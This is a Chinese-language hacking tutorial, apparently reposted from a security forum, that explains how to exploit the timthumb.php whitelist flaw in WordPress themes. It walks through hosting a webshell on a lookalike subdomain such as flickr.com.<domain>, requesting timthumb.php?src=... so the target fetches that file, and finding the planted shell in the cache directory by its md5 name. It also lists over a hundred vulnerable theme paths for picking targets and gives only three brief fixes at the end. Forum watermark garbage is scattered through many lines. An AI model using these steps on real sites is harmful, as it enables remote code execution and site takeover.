Wordpress缩略图脚本timthumb.php漏洞利用
imthumb.php是一个非常流行的Wordpress的缩略图脚本。国外一些非常著名的主题都用到了这个插件,比如Woothemes等。
漏洞主要是因为在timthumb中默认定义了一个包括 Flickr、Picasa等著名图片分享网站的白名单。黑客可以通过timthumb对这些白名单验证上的漏洞,使一些来自像"http://flickr.com.域名.com”这样的域名,获取上传执行PHP代码的权限。也就是说,如果你的主题有使用timthumb.php来动态生成缩略图,黑客可以通过timthumb的这个漏洞,任意上传各种恶意程序到你的timthumb.php定义的图片缓存目录!主要代码在
- // external domains that are allowed to be displayed on your website
- $allowedSites = array (
- 'flickr.com',
- 'picasa.com',
- 'blogger.com',
- 'wordpress.com',
- 'img.youtube.com',
- );
受影响版本:1.14 - 1.32
虽说这个插件漏洞公布出来有段时间了,但是还有许多像我这样的新手朋友还是不知道如何利用,现在就将我自己摸索心得总结出来。
6 K' P/ T7 g( y
一、准备工作
应具备的条件:Security5 x/ g) M1 c+ r
1、Wordpress安装了存在漏洞的timthumb.php插件,以主题为例
http://目标网站域名/wp-content/themes/canvas/timthumb.php
或T00LS) J# A( G: w- ?4 [
http://目标网站域名/wp-content/themes/canvas/thumb.php
T00LS; \- X9 d% ?# M q( p# b$ {) i
2、建立一个三级域名的网站,地址为
http://flickr.com.域名.com
或T00LS6 U: Y2 J/ q- a3 |
http://picasa.com.域名.com - 低调求发展; e7 V0 W% R* ^/ _
并在这里上传一个自己的木马。
3、这一个条件开始也是我没有注意的地方,网站空间必须无法解析PHP,否则的话木马就被解析,传到目标网站里的文件就不是源文件,而是解析后的文件。www.t00ls.net1 Y% \# S1 Z$ U! q/ r
二、查找目标网站 - 低调求发展 l& R6 H! w9 q! W1 V: d# L) j
& u3 ?/ ?9 S6 _( x P
国内可能安装此插件的比较少,在国外安装这个插件的wordpress特别多,例如
8q/scripts/timthumb.php
aerial/lib/timthumb.phpwww.t00ls.net! \! Z6 h ~+ k9 h
aesthete/timthumb.php - 低调求发展. f M- F: a Z% S
albizia/includes/timthumb.php
amphion-lite/script/timthumb.php
aqua-blue/includes/timthumb.phpT00LS% _7 W2 ^+ X( |/ T. \% L
aranovo/scripts/timthumb.php
arras/library/timthumb.php - 低调求发展% f# i/ [ { Q1 V6 n; K( k. r1 o
arras-theme/library/timthumb.php
arthemix-bronze/scripts/timthumb.php
arthemix-green/scripts/timthumb.php
artisan/includes/timthumb.php
a-simple-business-theme/scripts/timthumb.phpwww.t00ls.net: W& x; @" b& b; {" z9 L4 g
a-supercms/timthumb.php
aureola/scripts/timthumb.php# A6 {; ]: d: n
aurorae/timthumb.phpwww.t00ls.net6 m2 G" p$ w: e1 C9 F. q, J* i: j
autofashion/thumb.php1 A: l K6 t0 r
automotive-blog-theme/Quick Cash Auto/timthumb.php
automotive-blog-theme/timthumb.php - 低调求发展- s S; e8 w( f' m' v5 N8 e" o( O
bikes/thumb.php
black_eve/timthumb.php
blex/scripts/timthumb.php - 低调求发展& d' e3 u# b. a8 k! t
bloggnorge-a1/scripts/timthumb.php
blogified/timthumb.php - 低调求发展/ \$ W! y, w, s7 i2 ]/ B& E. `6 x
blue-corporate-hyve-theme/timthumb.php
bluemag/library/timthumb.phpT00LS0 Q2 ?- ^9 B: k# l! L; ]( L& T
blue-news/scripts/timthumb.php
bombax/includes/timthumb.php - 低调求发展& J8 S4 _; Y. i b
breakingnewz/timthumb.php - 低调求发展& f$ N3 |0 G5 L4 u9 X: M
brightsky/scripts/timthumb.php
brochure-melbourne/includes/timthumb.php
business-turnkey/assets/js/timthumb.php - 低调求发展0 s. A/ O$ E" |5 g( p, O6 e& ~" " x
calotropis/includes/timthumb.phpwww.t00ls.net( p1 o1 p6 v3 `% |3 g
coffee-lite/thumb.php
comet/scripts/timthumb.phpwww.t00ls.net. ~2 u5 w" f. V4 z4 X( M8 W
conceditor-wp-strict/scripts/timthumb.php
constructor/layouts/thumb.phpwww.t00ls.net' }% w# C1 U H0 V
constructor/libs/timthumb.phpwww.t00ls.net2 A' H! m; N3 I- _3 w7 \% X
constructor/timthumb.phpwww.t00ls.net6 u( ?! n( S" L- k6 J! ?2 s$ M/ y
coverht-wp/scripts/timthumb.php - 低调求发展/ ]2 g: M9 m0 S7 @0 _2 L) f
cover-wp/scripts/timthumb.phpwww.t00ls.net6 q) |; @3 F- w g6 `
dark-dream-media/timthumb.php - 低调求发展, o7 @0 ]% c! T0 O+ |
deep-blue/timthumb.phpT00LS! G) ?; r) s. U! Q
delicate/thumb.php1 G% N3 q8 v" m# O# Z* ]$ ]$ I
diamond-ray/thumb.php - 低调求发展& c2 \/ A- T i# n
dieselclothings/thumb.php - 低调求发展4 O2 x+ W" w! P! x0 J( u* s: z
digitalblue/thumb.php; y! I/ }" w5 x m' H" t6 I$ r
dimenzion/timthumb.phpwww.t00ls.net- {1 o j j: Z( b6 z @2 B
epione/script/timthumb.php
evr-green/scripts/timthumb.php
famous/megaframe/megapanel/inc/upload.phpwww.t00ls.net" N# ?! O6 ?6 z- `. e7 H
famous/timthumb.php
fashion-style/thumb.php
featuring/timthumb.phpwww.t00ls.net d1 a! W- [3 I
fliphoto/timthumb.php
flix/timthumb.php
fordreporter/scripts/thumb.phpSecurity/ p2 X5 g" G" V5 k8 g4 R2 t
freeside/thumb.php - 低调求发展: f9 G( o3 c* f* Y. o
fresh-blu/scripts/timthumb.php
go-green/modules/timthumb.phpT00LS, ]0 y, F8 N. Z1 }) M# E
granite-lite/scripts/timthumb.phpwww.t00ls.net' [, [- e. k) e4 ?+ d& @
greydove/timthumb.phpT00LS7 T |6 t1 m# S+ _# `4 _7 F
greyzed/functions/efrog/lib/timthumb.php
gunungkidul/thumb.php
heartspotting-beta/thumb.php - 低调求发展/ `" \/ l7 z+ j3 R7 l
heli-1-wordpress-theme/images/timthumb.phpT00LS+ y+ f4 ^; i4 \$ G' ~, z+ A2 T
ideatheme/timthumb.php
impressio/timthumb/timthumb.php
introvert/thumb.php
inuit-types/thumb.php
isotherm-news/thumb.php
iwana-v10/timthumb.phpSecurity* [3 ~% y B; u) a
jambo/thumb.php
jcblackone/thumb.phpT00LS. N5 ^( D/ M7 z* }; O2 s$ O' b
kratalistic/thumb.phpSecurity4 f- ^, d3 T9 f/ i% I6 `
life-style-free/thumb.php! @, F ?1 Z* W+ ~5 K3 m+ z2 }5 y
likehacker/timthumb.php" C7 j. d$ F$ W, ?
litepress/scripts/timthumb.php - 低调求发展' x7 W+ a% H6 w" a& @$ B6 _
loganpress-premium-theme-1/thumb.php
magazine-basic/thumb.php - 低调求发展2 s, h& D) D8 j3 E' c. l6 o
magup/timthumb.phpwww.t00ls.net2 o# R3 P% z- U
make-money-online-theme-1/scripts/timthumb.php
make-money-online-theme-2/scripts/timthumb.php
make-money-online-theme-3/scripts/timthumb.php
make-money-online-theme-4/scripts/timthumb.php - 低调求发展% p/ n, A: {* \! l
make-money-online-theme/scripts/timthumb.php
meintest/layouts/thumb.php
mobilephonecomparision/thumb.php - 低调求发展( i8 }# M( ^ a. K% g @' O
moi-magazine/timthumb.php
my-heli/images/timthumb.php/ g3 J. v3 h9 Y2 W7 E2 O$ z
mymag/timthumb.php
mystique/extensions/auto-thumb/timthumb.php5 s3 ~* }" a6 ]! B7 w: i
nash/theme-assets/php/timthumb.php
neofresh/timthumb.php
neo_wdl/includes/extensions/thumb.php
new-green-natural-living-ngnl/scripts/timthumb.phpT00LS! W# m7 Z1 i$ P, k2 u
newspress/thumb.php
pearlie/scripts/timthumb.php - 低调求发展1 ~7 H$ X7 C# |! h( j% Y# t2 }
pico/scripts/timthumb.php
postage-sydney/includes/timthumb.php
premium-violet/thumb.php
probluezine/timthumb.php
pronto/cjl/pronto/uploadify/check.phpSecurity* d6 ^6 p+ U7 g2 q
pronto/cjl/pronto/uploadify/uploadify.phpwww.t00ls.net# Y! N' ~# m6 t; c; s, R9 a
r755/thumb.php
regal/timthumb.php
shaan/timthumb.php
shadow-block/thumb.php( `0 j. X% S8 C4 ^. M" _
shadow/timthumb.php
simple-but-great/timthumb.php
simplenews_premium/scripts/timthumb.php
simple-red-theme/timthumb.php
simple-tabloid/thumb.php
simplewhite/timthumb.phpT00LS: k7 |8 x( V' Z) `
slidette/timThumb/timthumb.php
snowblind_colbert/thumb.php
snowblind/thumb.phpT00LS$ {: m, K# f3 P& h2 z* k j
spotlight/timthumb.phpSecurity9 G' X" `" K- c: q0 n
squeezepage/timthumb.php
standout/thumb.phpwww.t00ls.net" I' S: q- V& z) d
suffusion/timthumb.php) c) O& [" J: H5 ?/ H; n, d
swift/includes/thumb.phpT00LS8 M, Z( b) N8 T8 l$ X! N& P' U7 K
swift/includes/timthumb.phpT00LS1 m3 V/ K% y" J ?$ @' e
swift/timthumb.phpT00LS" f( z7 s2 Z, q& O
techozoic-fluid/options/thumb.php
the_dark_os/tools/timthumb.php - 低调求发展5 D+ D3 v9 P2 d- v; ?
themetiger-fashion/thumb.phpT00LS- l$ L. c( t2 F4 J3 Y
theory/thumb.php - 低调求发展5 L# Q$ h7 ]8 l1 m# b4 C" k
the-theme/core/libs/thumbnails/thumb.phpT00LS( J1 V; j' Q* r
thrillingtheme/thumb.php
tm-theme/js/timthumb.phpT00LS; X% }* v. M) D1 b. O4 w+ X* h
totallyred/scripts/timthumb.php
travelogue-theme/scripts/timthumb.php
true-blue-theme/timthumb.php
ttnews-theme/timthumb.php
twittplus/scripts/timthumb.php - 低调求发展+ h! Z7 @) J! d
typographywp/timthumb.php
ugly/timthumb.php* K9 e: y! h5 K0 A/ C+ l
unity/timthumb.php
versitility/timthumb.php
vibefolio-teaser-10/scripts/timthumb.php3 s: \9 ~" D+ S9 g$ P# M/ w' j
vina/thumb.php
whitemag/script/thumb.php - 低调求发展4 d* B: P6 F0 Y6 ?% X& z4 D T" e
wpapi/thumb.phpSecurity; N" u5 I' V( V/ S
wpbus-d4/includes/timthumb.php* k- d+ k+ {9 A6 L4 o. N
wp-creativix/scripts/timthumb.php - 低调求发展* h$ {# b- z& _1 y K2 ]$ m
wp-newsmagazine/scripts/timthumb.php
wp-perfect/js/timthumb.php
wp-premium-orange/timthumb.php e; w9 x+ H& b5 n; Y6 D
xiando-one/thumb.phpSecurity: y- i+ ?& p; H" G
zcool-like/timthumb.phpwww.t00ls.net& z3 n: z# a5 F y8 T
zcool-like/uploadify.php
T00LS; L- d7 r, v/ z
三、开始入侵 - 低调求发展- J2 Q% \' W+ t/ `5 ?
在浏览器地址输入www.t00ls.net; |" o. l. A' k3 F3 k6 K
http://目标网站路径/timthumb.php?src=http://http://flickr.com.域名.com/木马名.phpwww.t00ls.net9 c5 O# r7 f/ W/ r$ y9 O( P
1 l: b: C B* s; r- H. V3 y
那么我就可以在
http://目标网站路径/cache/external_md5值.phpSecurity6 c# ?* l8 b0 S/ B: J
或
http://目标网站路径/temp/external_md5值.php
如果timthumb.php版本低于2.0的话,那么木马地址为www.t00ls.net$ j+ j' {& b( ]1 w
http://目标网站路径/cache/md5值.php
: F% " {7 L$ u/ d
这里需要说明的是,md5值是http://http://flickr.com.域名.com/木马名.php的md5值
四、总结Security- l( @. w4 `+ J' S
虽说,通过此漏洞入侵的条件比较苛刻,但由于国外使用wordpress的用户非常多,而且大量的主题使用了此插件,因此,还是有许多网站存在安全隐患的。
修补方法:T00LS5 C! B$ w# R( o# d# i: J. s
1、用最新版本的timthumb.php覆盖原文件;
2、删除白名单;www.t00ls.net/ I) U; k# A8 }( J- r
3、服务器目录权限设置。
下一篇:浏览器Firefox下攻击技巧
